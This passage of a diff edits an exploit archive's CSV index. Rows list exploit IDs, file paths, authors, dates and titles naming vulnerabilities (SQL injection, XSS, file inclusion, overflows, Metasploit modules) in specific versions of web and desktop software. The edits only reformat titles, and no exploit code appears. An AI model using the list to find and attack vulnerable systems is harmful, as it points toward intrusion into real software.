deleteSingle fullName Variable Arbitrary File Deletion",2006-02-15,"Leandro Meiners",linux,remote,0 27235,platforms/linux/remote/27235.txt,"SAP Business Connector 4.6/4.7 adapter-index.dsp url Variable Arbitrary Site Redirect",2006-02-15,"Leandro Meiners",linux,remote,0 27236,platforms/php/webapps/27236.txt,"MyBB 1.0.3 - Private.php Multiple SQL Injection",2006-02-15,imei,php,webapps,0 -27237,platforms/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 +27237,platforms/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 - HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 27238,platforms/php/webapps/27238.php,"DreamCost HostAdmin 3.0 - Index.php Remote File Inclusion",2006-02-16,ReZEN,php,webapps,0 27239,platforms/php/webapps/27239.txt,"BirthSys 3.1 - Multiple SQL Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 27240,platforms/php/webapps/27240.txt,"MyBB 1.0.2/1.0.3 Managegroup.php SQL Injection",2006-02-16,imei,php,webapps,0 @@ -24374,11 +24374,11 @@ id,file,description,date,author,platform,type,port 27250,platforms/php/webapps/27250.txt,"TTS Software Time Tracking Software 3.0 Edituser.php Access Validation",2006-02-20,"Aliaksandr Hartsuyeu",php,webapps,0 27251,platforms/php/webapps/27251.txt,"Magic Calendar Lite 1.02 - Index.php SQL Injection",2006-02-20,"Aliaksandr Hartsuyeu",php,webapps,0 27252,platforms/php/webapps/27252.txt,"CuteNews 1.4.1 Show_News.php Cross-Site Scripting",2006-02-20,imei,php,webapps,0 -27253,platforms/linux/dos/27253.txt,"Mozilla Firefox 1.0.x/1.5 HTML Parsing Denial of Service",2006-02-21,"Yuan Qi",linux,dos,0 +27253,platforms/linux/dos/27253.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Denial of Service",2006-02-21,"Yuan Qi",linux,dos,0 27254,platforms/php/webapps/27254.txt,"PostNuke 0.6x/0.7x NS-Languages Module language Parameter XSS",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0 27255,platforms/php/webapps/27255.txt,"PostNuke 0.6x/0.7x NS-Languages Module language Parameter SQL Injection",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0 27256,platforms/php/webapps/27256.txt,"RunCMS 1.x - Ratefile.php Cross-Site Scripting",2006-02-22,"Roozbeh Afrasiabi",php,webapps,0 -27257,platforms/linux/dos/27257.html,"Multiple Mozilla Products IFRAME JavaScript Execution Vulnerabilit",2006-02-22,"Georgi Guninski",linux,dos,0 +27257,platforms/linux/dos/27257.html,"Multiple Mozilla Products - IFRAME JavaScript Execution Vulnerabilit",2006-02-22,"Georgi Guninski",linux,dos,0 27258,platforms/asp/dos/27258.txt,"Ipswitch WhatsUp Professional 2006 - Remote Denial of Service",2006-02-22,"Josh Zlatin-Amishav",asp,dos,0 27259,platforms/php/webapps/27259.txt,"Noah's Classifieds 1.0/1.3 - Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,trueend5,php,webapps,0 27260,platforms/php/webapps/27260.txt,"Noah's Classifieds 1.0/1.3 - Search Page SQL Injection",2006-02-22,trueend5,php,webapps,0 @@ -24397,13 +24397,13 @@ id,file,description,date,author,platform,type,port 27271,platforms/windows/remote/27271.rb,"HP Data Protector - CMD Install Service (Metasploit)",2013-08-02,"Ben Turner",windows,remote,0 27272,platforms/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps,0 27273,platforms/windows/dos/27273.txt,"TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) Crash PoC",2013-08-02,d3b4g,windows,dos,0 -27274,platforms/php/webapps/27274.txt,"Ginkgo CMS (index.php rang param) - SQL Injection",2013-08-02,Raw-x,php,webapps,0 +27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - (index.php rang param) SQL Injection",2013-08-02,Raw-x,php,webapps,0 27275,platforms/php/webapps/27275.txt,"FunGamez Remote File Upload",2013-08-02,"cr4wl3r ",php,webapps,0 27276,platforms/php/webapps/27276.html,"Bigace CMS 2.7.8 - Add Admin Account CSRF",2013-08-02,"Yashar shahinzadeh",php,webapps,0 27277,platforms/windows/remote/27277.py,"PCMAN FTP 2.07 - PASS Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (2)",2013-08-12,Metasploit,hardware,remote,0 27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 -27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b (pages.php page_name param) - SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 +27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - (pages.php page_name param) SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 27282,platforms/windows/local/27282.txt,"Agnitum Outpost Security Suite 8.1 - Privilege Escalation",2013-08-02,"Ahmad Moghimi",windows,local,0 27283,platforms/hardware/webapps/27283.txt,"D-Link DIR-645 1.03B08 - Multiple Vulnerabilities",2013-08-02,"Roberto Paleari",hardware,webapps,0 27284,platforms/hardware/webapps/27284.txt,"INSTEON Hub 2242-222 - Lack of Web and API Authentication",2013-08-02,"Trustwave's SpiderLabs",hardware,webapps,0 @@ -24464,17 +24464,17 @@ id,file,description,date,author,platform,type,port 27339,platforms/php/webapps/27339.txt,"PEHEPE Membership Management System 3.0 - Remote PHP Script Code Injection",2006-02-28,"Yunus Emre Yilmaz",php,webapps,0 27340,platforms/php/webapps/27340.txt,"SMBlog 1.2 - Arbitrary PHP Command Execution",2006-03-01,botan,php,webapps,0 27341,platforms/php/webapps/27341.txt,"DCI-Designs Dawaween 1.03 Poems.php SQL Injection",2006-03-02,sherba,php,webapps,0 -27342,platforms/php/webapps/27342.txt,"PluggedOut Nexus 0.1 forgotten_password.php SQL Injection",2006-03-02,"Hamid Ebadi",php,webapps,0 -27343,platforms/php/webapps/27343.txt,"VBulletin 3.0/3.5 Profile.php Email Field HTML Injection",2006-03-02,imei,php,webapps,0 +27342,platforms/php/webapps/27342.txt,"PluggedOut Nexus 0.1 - forgotten_password.php SQL Injection",2006-03-02,"Hamid Ebadi",php,webapps,0 +27343,platforms/php/webapps/27343.txt,"VBulletin 3.0/3.5 - Profile.php Email Field HTML Injection",2006-03-02,imei,php,webapps,0 27344,platforms/php/webapps/27344.txt,"NZ Ecommerce System - index.php Multiple Parameter SQL Injection",2006-03-02,r0t,php,webapps,0 27345,platforms/php/webapps/27345.txt,"LogIT 1.3/1.4 - Remote File Inclusion",2006-03-02,botan,php,webapps,0 27346,platforms/php/webapps/27346.txt,"VBZoom Forum 1.11 Show.php MainID SQL Injection",2006-03-04,Mr.SNAKE,php,webapps,0 -27347,platforms/php/webapps/27347.txt,"VBZooM Forum 1.11 comment.php UserID Parameter XSS",2006-03-04,Mr.SNAKE,php,webapps,0 -27348,platforms/php/webapps/27348.txt,"VBZooM Forum 1.11 contact.php UserID Parameter XSS",2006-03-04,Mr.SNAKE,php,webapps,0 +27347,platforms/php/webapps/27347.txt,"VBZooM Forum 1.11 - comment.php UserID Parameter XSS",2006-03-04,Mr.SNAKE,php,webapps,0 +27348,platforms/php/webapps/27348.txt,"VBZooM Forum 1.11 - contact.php UserID Parameter XSS",2006-03-04,Mr.SNAKE,php,webapps,0 27349,platforms/php/webapps/27349.txt,"phpArcadeScript 2.0 tellafriend.php gamename Parameter XSS",2006-03-04,Retard,php,webapps,0 -27350,platforms/php/webapps/27350.txt,"phpArcadeScript 2.0 loginbox.php login_status Parameter XSS",2006-03-04,Retard,php,webapps,0 +27350,platforms/php/webapps/27350.txt,"phpArcadeScript 2.0 - loginbox.php login_status Parameter XSS",2006-03-04,Retard,php,webapps,0 27351,platforms/php/webapps/27351.txt,"phpArcadeScript 2.0 - index.php submissionstatus Parameter XSS",2006-03-04,Retard,php,webapps,0 -27352,platforms/php/webapps/27352.txt,"phpArcadeScript 2.0 browse.php Multiple Parameter XSS",2006-03-04,Retard,php,webapps,0 +27352,platforms/php/webapps/27352.txt,"phpArcadeScript 2.0 - browse.php Multiple Parameter XSS",2006-03-04,Retard,php,webapps,0 27353,platforms/php/webapps/27353.txt,"phpArcadeScript 2.0 displaygame.php gamefile Parameter XSS",2006-03-04,Retard,php,webapps,0 27354,platforms/php/webapps/27354.txt,"Easy Forum 2.5 New User Image File HTML Injection",2006-03-04,"Aliaksandr Hartsuyeu",php,webapps,0 27355,platforms/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 Misc.php Cross-Site Scripting",2006-03-04,r57shell,php,webapps,0 @@ -24491,19 +24491,19 @@ id,file,description,date,author,platform,type,port 27372,platforms/php/webapps/27372.txt,"HitHost 1.0 viewuser.php hits Parameter XSS",2006-03-06,Retard,php,webapps,0 27373,platforms/php/webapps/27373.txt,"TextfileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,php,webapps,0 27374,platforms/php/webapps/27374.txt,"sBlog 0.7.2 - search.php keyword Variable POST Method XSS",2006-03-09,Kiki,php,webapps,0 -27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 comments_do.php Multiple Variable POST Method XSS",2006-03-09,Kiki,php,webapps,0 +27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 - comments_do.php Multiple Variable POST Method XSS",2006-03-09,Kiki,php,webapps,0 27376,platforms/ios/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,ios,webapps,0 -27377,platforms/windows/dos/27377.txt,"Easy File Sharing Web Server 3.2 Format String DoS",2006-03-09,"Revnic Vasile",windows,dos,0 +27377,platforms/windows/dos/27377.txt,"Easy File Sharing Web Server 3.2 - Format String DoS",2006-03-09,"Revnic Vasile",windows,dos,0 27378,platforms/windows/remote/27378.txt,"Easy File Sharing Web Server 3.2 Full Path Request Arbitrary File Upload",2006-03-09,"Revnic Vasile",windows,remote,0 27379,platforms/php/webapps/27379.txt,"ADP Forum 2.0.x - Subject Field HTML Injection",2006-03-09,liz0,php,webapps,0 -27380,platforms/php/webapps/27380.txt,"myBloggie 2.1.2/2.1.3 upload.php Multiple Parameter XSS",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 +27380,platforms/php/webapps/27380.txt,"myBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter XSS",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27381,platforms/php/webapps/27381.txt,"myBloggie 2.1.2/2.1.3 delcomment.php Multiple Parameter XSS",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27382,platforms/php/webapps/27382.txt,"myBloggie 2.1.2/2.1.3 - deluser.php 'id' Parameter XSS",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 -27383,platforms/php/webapps/27383.txt,"myBloggie 2.1.2/2.1.3 addcat.php errormsg Parameter XSS",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 +27383,platforms/php/webapps/27383.txt,"myBloggie 2.1.2/2.1.3 - addcat.php errormsg Parameter XSS",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27384,platforms/php/webapps/27384.txt,"myBloggie 2.1.2/2.1.3 edituser.php errormsg Parameter XSS",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 -27385,platforms/php/webapps/27385.txt,"myBloggie 2.1.2/2.1.3 adduser.php errormsg Parameter XSS",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 +27385,platforms/php/webapps/27385.txt,"myBloggie 2.1.2/2.1.3 - adduser.php errormsg Parameter XSS",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27386,platforms/php/webapps/27386.txt,"myBloggie 2.1.2/2.1.3 editcat.php errormsg Parameter XSS",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 -27387,platforms/php/webapps/27387.txt,"myBloggie 2.1.2/2.1.3 add.php trackback_url Parameter XSS",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 +27387,platforms/php/webapps/27387.txt,"myBloggie 2.1.2/2.1.3 - add.php trackback_url Parameter XSS",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27388,platforms/php/webapps/27388.txt,"myBloggie 2.1.2/2.1.3 delcat.php cat_id Parameter XSS",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27389,platforms/php/webapps/27389.txt,"myBloggie 2.1.2/2.1.3 del.php post_id Parameter XSS",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27390,platforms/php/webapps/27390.txt,"DCP-Portal 3.7/4.x/5.x/6.x - index.php Multiple Parameter XSS",2006-03-09,"Nenad Jovanovic",php,webapps,0 @@ -24526,7 +24526,7 @@ id,file,description,date,author,platform,type,port 27408,platforms/php/webapps/27408.txt,"txtForum 1.0.3/1.0.4 - Remote PHP Script Code Injection",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27409,platforms/php/webapps/27409.txt,"QwikiWiki 1.4/1.5 - index.php Multiple Parameter XSS",2006-03-10,Kiki,php,webapps,0 27410,platforms/php/webapps/27410.txt,"QwikiWiki 1.4/1.5 - login.php Multiple Parameter XSS",2006-03-10,Kiki,php,webapps,0 -27411,platforms/php/webapps/27411.txt,"QwikiWiki 1.4/1.5 pageindex.php help Parameter XSS",2006-03-10,Kiki,php,webapps,0 +27411,platforms/php/webapps/27411.txt,"QwikiWiki 1.4/1.5 - pageindex.php help Parameter XSS",2006-03-10,Kiki,php,webapps,0 27412,platforms/php/webapps/27412.txt,"QwikiWiki 1.4/1.5 recentchanges.php help Parameter XSS",2006-03-10,Kiki,php,webapps,0 27413,platforms/php/webapps/27413.txt,"Core News 2.0.1 - Index.php Remote Code Execution",2006-03-10,botan,php,webapps,0 27414,platforms/php/webapps/27414.txt,"vCard 2.8/2.9 Create.php Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Linux_Drox,php,webapps,0 @@ -24543,7 +24543,7 @@ id,file,description,date,author,platform,type,port 27425,platforms/linux/dos/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow",2006-03-16,"Josh Bressers",linux,dos,0 27427,platforms/php/webapps/27427.txt,"Contrexx CMS 1.0.x - Index.php Cross-Site Scripting",2006-03-16,Soot,php,webapps,0 27428,platforms/hardware/remote/27428.rb,"D-Link Devices - Unauthenticated Remote Command Execution (1)",2013-08-08,Metasploit,hardware,remote,0 -27429,platforms/windows/remote/27429.rb,"Firefox onreadystatechange Event DocumentViewerImpl Use After Free",2013-08-08,Metasploit,windows,remote,0 +27429,platforms/windows/remote/27429.rb,"Firefox - onreadystatechange Event DocumentViewerImpl Use-After-Free",2013-08-08,Metasploit,windows,remote,0 27430,platforms/php/webapps/27430.txt,"PHPFox 3.6.0 - (build3) Multiple SQL Injection",2013-08-08,"Matias Fontanini",php,webapps,0 27431,platforms/php/webapps/27431.txt,"BigTree CMS 4.0 RC2 - Multiple Vulnerabilities",2013-08-08,"High-Tech Bridge SA",php,webapps,0 27991,platforms/php/webapps/27991.txt,"PostNuke 0.76 RC2 - Multiple Input Validation Vulnerabilities",2006-06-07,SpC-x,php,webapps,0 @@ -24567,14 +24567,14 @@ id,file,description,date,author,platform,type,port 27459,platforms/php/webapps/27459.txt,"CoMoblog 1.0 Img.php Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0 27460,platforms/multiple/dos/27460.pl,"RealNetworks Multiple Products - Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0 27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0 -27462,platforms/php/webapps/27462.txt,"AdMan 1.0.20051221 ViewStatement.php SQL Injection",2003-03-23,r0t,php,webapps,0 +27462,platforms/php/webapps/27462.txt,"AdMan 1.0.20051221 - ViewStatement.php SQL Injection",2003-03-23,r0t,php,webapps,0 27463,platforms/jsp/webapps/27463.txt,"IBM Tivoli Business Systems Manager 3.1 APWC_Win_Main.JSP Cross-Site Scripting",2006-03-23,anonymous,jsp,webapps,0 27464,platforms/cgi/webapps/27464.txt,"Cholod MySQL Based Message Board Mb.CGI SQL Injection",2006-03-24,kspecial,cgi,webapps,0 27465,platforms/php/webapps/27465.txt,"VihorDesign Index.php Cross-Site Scripting",2006-03-24,botan,php,webapps,0 27466,platforms/php/webapps/27466.txt,"VihorDesign Index.php Remote File Inclusion",2006-03-24,botan,php,webapps,0 27467,platforms/php/webapps/27467.txt,"ConfTool 1.1 - Index.php Cross-Site Scripting",2006-03-27,botan,php,webapps,0 27468,platforms/php/webapps/27468.txt,"Nuked-Klan 1.x - Index.php SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 -27469,platforms/asp/webapps/27469.txt,"EZHomePagePro 1.5 email.asp Multiple Parameter XSS",2006-03-27,r0t,asp,webapps,0 +27469,platforms/asp/webapps/27469.txt,"EZHomePagePro 1.5 - email.asp Multiple Parameter XSS",2006-03-27,r0t,asp,webapps,0 27470,platforms/asp/webapps/27470.txt,"EZHomePagePro 1.5 users_search.asp Multiple Parameter XSS",2006-03-27,r0t,asp,webapps,0 27471,platforms/asp/webapps/27471.txt,"EZHomePagePro 1.5 users_calendar.asp page Parameter XSS",2006-03-27,r0t,asp,webapps,0 27472,platforms/asp/webapps/27472.txt,"EZHomePagePro 1.5 users_profiles.asp Multiple Parameter XSS",2006-03-27,r0t,asp,webapps,0 @@ -24582,7 +24582,7 @@ id,file,description,date,author,platform,type,port 27474,platforms/multiple/dos/27474.txt,"LibVC VCard 003 Processing Buffer Overflow",2006-03-21,trew,multiple,dos,0 27475,platforms/php/webapps/27475.txt,"SaphpLesson 2.0 Print.php SQL Injection",2006-03-27,Linux_Drox,php,webapps,0 27476,platforms/windows/dos/27476.txt,"Microsoft .NET Framework SDK 1.0/1.1 MSIL Tools Buffer Overflow Vulnerabilities",2006-03-27,"Dinis Cruz",windows,dos,0 -27477,platforms/php/webapps/27477.txt,"Maian Weblog 2.0 print.php Multiple Parameter SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 +27477,platforms/php/webapps/27477.txt,"Maian Weblog 2.0 - print.php Multiple Parameter SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27478,platforms/php/webapps/27478.txt,"Maian Weblog 2.0 mail.php Multiple Parameter SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27479,platforms/asp/webapps/27479.txt,"Toast Forums 1.6 Toast.ASP Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0 27480,platforms/asp/webapps/27480.txt,"Online Quiz System - prequiz.asp exam Parameter XSS",2006-03-27,r0t,asp,webapps,0 @@ -24603,7 +24603,7 @@ id,file,description,date,author,platform,type,port 27498,platforms/php/webapps/27498.txt,"CONTROLzx Hms 3.3.4 dedicated_order.php dedicatedPlanID Parameter XSS",2006-03-28,r0t,php,webapps,0 27499,platforms/php/webapps/27499.txt,"CONTROLzx Hms 3.3.4 server_management.php plan_id Parameter XSS",2006-03-28,r0t,php,webapps,0 27500,platforms/php/webapps/27500.txt,"Arab Portal System 2.0 online.php title Parameter XSS",2006-03-28,o.y.6,php,webapps,0 -27501,platforms/php/webapps/27501.txt,"Arab Portal System 2.0 download.php title Parameter XSS",2006-03-28,o.y.6,php,webapps,0 +27501,platforms/php/webapps/27501.txt,"Arab Portal System 2.0 - download.php title Parameter XSS",2006-03-28,o.y.6,php,webapps,0 27502,platforms/php/webapps/27502.txt,"Connect Daily 3.2.8/3.2.9 ViewDay.html Multiple Parameter XSS",2006-03-28,r0t,php,webapps,0 27503,platforms/php/webapps/27503.txt,"Connect Daily 3.2.8/3.2.9 ViewSearch.html Multiple Parameter XSS",2006-03-28,r0t,php,webapps,0 27504,platforms/php/webapps/27504.txt,"Connect Daily 3.2.8/3.2.9 ViewYear.html Multiple Parameter XSS",2006-03-28,r0t,php,webapps,0 @@ -24613,12 +24613,12 @@ id,file,description,date,author,platform,type,port 27508,platforms/php/remote/27508.txt,"PHP 4.x/5.x - Html_Entity_Decode() Information Disclosure",2006-03-29,Samuel,php,remote,0 27509,platforms/php/webapps/27509.txt,"OneOrZero 1.6.3 Helpdesk Index.php SQL Injection",2006-03-28,Preddy,php,webapps,0 27510,platforms/php/webapps/27510.txt,"PhxContacts 0.93 carnet.php Multiple Parameter SQL Injection",2006-03-29,"Morocco Security Team",php,webapps,0 -27511,platforms/php/webapps/27511.txt,"PhxContacts 0.93 contact_view.php id_contact Parameter SQL Injection",2006-03-29,"Morocco Security Team",php,webapps,0 +27511,platforms/php/webapps/27511.txt,"PhxContacts 0.93 - contact_view.php id_contact Parameter SQL Injection",2006-03-29,"Morocco Security Team",php,webapps,0 27512,platforms/php/webapps/27512.txt,"PhxContacts 0.93 - Login.php Cross-Site Scripting",2006-03-29,DaBDouB-MoSiKaR,php,webapps,0 27513,platforms/php/webapps/27513.txt,"VNews 1.2 - Multiple SQL Injection",2006-03-30,"Aliaksandr Hartsuyeu",php,webapps,0 27514,platforms/php/webapps/27514.txt,"Tribq CMS 5.2.7 - Adding/Editing New Administrator Account CSRF",2013-08-12,"Yashar shahinzadeh",php,webapps,0 27515,platforms/php/webapps/27515.txt,"Open Real Estate CMS 1.5.1 - Multiple Vulnerabilities",2013-08-12,"Yashar shahinzadeh",php,webapps,0 -27518,platforms/php/webapps/27518.txt,"MLMAuction Script (gallery.php id param) - SQL Injection",2013-08-12,3spi0n,php,webapps,0 +27518,platforms/php/webapps/27518.txt,"MLMAuction Script - (gallery.php id param) SQL Injection",2013-08-12,3spi0n,php,webapps,0 27519,platforms/php/webapps/27519.txt,"phpVID 1.2.3 - Multiple Vulnerabilities",2013-08-12,3spi0n,php,webapps,0 27729,platforms/php/webapps/27729.txt,"Scry Gallery 1.1 - Index.php Cross-Site Scripting",2006-04-24,mayank,php,webapps,0 27521,platforms/php/webapps/27521.txt,"Ajax PHP Penny Auction 1.x 2.x - Multiple Vulnerabilities",2013-08-12,"Taha Hunter",php,webapps,80 @@ -24671,7 +24671,7 @@ id,file,description,date,author,platform,type,port 27572,platforms/php/webapps/27572.txt,"SKForum 1.x - planning.View.action time Parameter XSS",2006-04-06,r0t,php,webapps,0 27573,platforms/php/webapps/27573.txt,"SKForum 1.x - user.View.action userID Parameter XSS",2006-04-06,r0t,php,webapps,0 27574,platforms/php/webapps/27574.txt,"Basic Analysis and Security Engine 1.2.4 PrintFreshPage Cross-Site Scripting",2003-04-06,"Adam Ely",php,webapps,0 -27575,platforms/php/webapps/27575.txt,"MD News 1 Admin.php SQL Injection",2006-04-06,"Aliaksandr Hartsuyeu",php,webapps,0 +27575,platforms/php/webapps/27575.txt,"MD News 1 - Admin.php SQL Injection",2006-04-06,"Aliaksandr Hartsuyeu",php,webapps,0 27576,platforms/php/webapps/27576.txt,"MAXDEV CMS 1.0.72/1.0.73 PNuserapi.php SQL Injection",2006-04-06,king_purba,php,webapps,0 27577,platforms/windows/remote/27577.txt,"Microsoft Internet Explorer 5.0 Address Bar Spoofing",2006-04-03,"Hai Nam Luke",windows,remote,0 27578,platforms/php/webapps/27578.txt,"Jupiter CMS 1.1.5 - Index.php Cross-Site Scripting",2006-04-07,KaDaL-X,php,webapps,0 @@ -24728,15 +24728,15 @@ id,file,description,date,author,platform,type,port 27630,platforms/linux/remote/27630.txt,"Plone 2.x - MembershipTool Access Control Bypass",2006-04-12,MJ0011,linux,remote,0 27631,platforms/cgi/webapps/27631.txt,"Interaktiv.shop 4/5 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-12,r0t,cgi,webapps,0 27632,platforms/php/webapps/27632.txt,"phpMyAdmin 2.7 - SQL.php Cross-Site Scripting",2005-10-31,p0w3r,php,webapps,0 -27635,platforms/linux/dos/27635.txt,"Mozilla Firefox 1.0.x/1.5 HTML Parsing Null Pointer Dereference Denial of Service",2006-04-13,"Thomas Waldegger",linux,dos,0 -27636,platforms/multiple/remote/27636.txt,"Adobe Document Server 6.0 Extensions ads-readerext actionID Parameter XSS",2006-04-13,"Tan Chew Keong",multiple,remote,0 -27637,platforms/multiple/remote/27637.txt,"Adobe Document Server 6.0 Extensions AlterCast op Parameter XSS",2006-04-13,"Tan Chew Keong",multiple,remote,0 +27635,platforms/linux/dos/27635.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Null Pointer Dereference Denial of Service",2006-04-13,"Thomas Waldegger",linux,dos,0 +27636,platforms/multiple/remote/27636.txt,"Adobe Document Server 6.0 Extensions - ads-readerext actionID Parameter XSS",2006-04-13,"Tan Chew Keong",multiple,remote,0 +27637,platforms/multiple/remote/27637.txt,"Adobe Document Server 6.0 Extensions - AlterCast op Parameter XSS",2006-04-13,"Tan Chew Keong",multiple,remote,0 27638,platforms/php/webapps/27638.pl,"SimpleBBS 1.0.6/1.0.7/1.1 - Remote Arbitrary Command Execution",2006-04-13,rUnViRuS,php,webapps,0 27639,platforms/multiple/dos/27639.txt,"W3C Amaya 9.4 textarea rows Attribute Value Overflow",2006-04-13,"Thomas Waldegger",multiple,dos,0 27640,platforms/multiple/dos/27640.txt,"W3C Amaya 9.4 legend color Attribute Value Overflow",2006-04-13,"Thomas Waldegger",multiple,dos,0 27641,platforms/linux/dos/27641.txt,"Opera Web Browser 8.52 Stylesheet Attribute Buffer Overflow",2006-04-13,"SEC Consult",linux,dos,0 27642,platforms/php/webapps/27642.txt,"AR-Blog 5.2 Print.php Cross-Site Scripting",2006-04-14,ALMOKANN3,php,webapps,0 -27643,platforms/php/webapps/27643.php,"PHPAlbum 0.2.2/0.2.3/4.1 Language.php File Include",2006-04-15,rgod,php,webapps,0 +27643,platforms/php/webapps/27643.php,"PHPAlbum 0.2.2/0.2.3/4.1 - Language.php File Include",2006-04-15,rgod,php,webapps,0 27644,platforms/php/webapps/27644.txt,"PlanetSearch + Planetsearchplus.php Cross-Site Scripting",2006-04-13,d4igoro,php,webapps,0 27645,platforms/php/webapps/27645.txt,"PowerClan 1.14 Member.php SQL Injection",2006-04-13,d4igoro,php,webapps,0 27646,platforms/php/webapps/27646.txt,"LifeType 1.0.3 - Index.php Cross-Site Scripting",2006-04-13,"Rusydi Hasan",php,webapps,0 @@ -24751,7 +24751,7 @@ id,file,description,date,author,platform,type,port 27971,platforms/windows/dos/27971.txt,"Microsoft Internet Explorer 5.0.1 Frameset Memory Corruption",2006-06-05,Kil13r,windows,dos,0 27655,platforms/ios/webapps/27655.txt,"Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0 27656,platforms/ios/webapps/27656.txt,"Photo Transfer Upload 1.0 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0 -27658,platforms/php/webapps/27658.txt,"PHPGuestbook 0.0.2/1.0 HTML Injection",2006-04-15,Qex,php,webapps,0 +27658,platforms/php/webapps/27658.txt,"PHPGuestbook 0.0.2/1.0 - HTML Injection",2006-04-15,Qex,php,webapps,0 27659,platforms/php/webapps/27659.txt,"phpFaber TopSites Index.php Cross-Site Scripting",2006-04-17,botan,php,webapps,0 27660,platforms/php/webapps/27660.txt,"Monster Top List 1.4 Functions.php Remote File Inclusion",2006-04-17,r0t,php,webapps,0 27661,platforms/php/webapps/27661.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (1)",2006-04-17,Hessam-x,php,webapps,0 @@ -24771,14 +24771,14 @@ id,file,description,date,author,platform,type,port 27675,platforms/php/webapps/27675.txt,"PHPLister 0.4.1 - Index.php Cross-Site Scripting",2006-04-18,botan,php,webapps,0 27676,platforms/php/webapps/27676.txt,"CutePHP CuteNews 1.4.1 Editnews Module - Cross-Site Scripting",2006-04-19,LoK-Crew,php,webapps,0 27677,platforms/php/webapps/27677.txt,"Article Publisher 1.0.1 Pro - Multiple SQL Injection",2006-04-19,r0t,php,webapps,0 -27678,platforms/php/webapps/27678.txt,"ModernBill 4.3 User.php SQL Injection",2006-04-19,r0t,php,webapps,0 +27678,platforms/php/webapps/27678.txt,"ModernBill 4.3 - User.php SQL Injection",2006-04-19,r0t,php,webapps,0 27679,platforms/cgi/webapps/27679.txt,"Visale 1.0 pbpgst.cgi keyval Parameter XSS",2006-04-19,r0t,cgi,webapps,0 27680,platforms/cgi/webapps/27680.txt,"Visale 1.0 pblscg.cgi catsubno Parameter XSS",2006-04-19,r0t,cgi,webapps,0 27681,platforms/cgi/webapps/27681.txt,"Visale 1.0 pblsmb.cgi listno Parameter XSS",2006-04-19,r0t,cgi,webapps,0 27682,platforms/cgi/webapps/27682.txt,"CommuniMail 1.2 mailadmin.cgi list_id Parameter XSS",2006-04-19,r0t,cgi,webapps,0 27683,platforms/cgi/webapps/27683.txt,"CommuniMail 1.2 templates.cgi form_id Parameter XSS",2006-04-19,r0t,cgi,webapps,0 27684,platforms/jsp/webapps/27684.txt,"Cisco Wireless Lan Solution Engine ArchiveApplyDisplay.JSP Cross-Site Scripting",2006-04-19,"Adam Pointon",jsp,webapps,0 -27685,platforms/cgi/webapps/27685.txt,"IntelliLink Pro 5.06 addlink_lwp.cgi url Parameter XSS",2006-04-19,r0t,cgi,webapps,0 +27685,platforms/cgi/webapps/27685.txt,"IntelliLink Pro 5.06 - addlink_lwp.cgi url Parameter XSS",2006-04-19,r0t,cgi,webapps,0 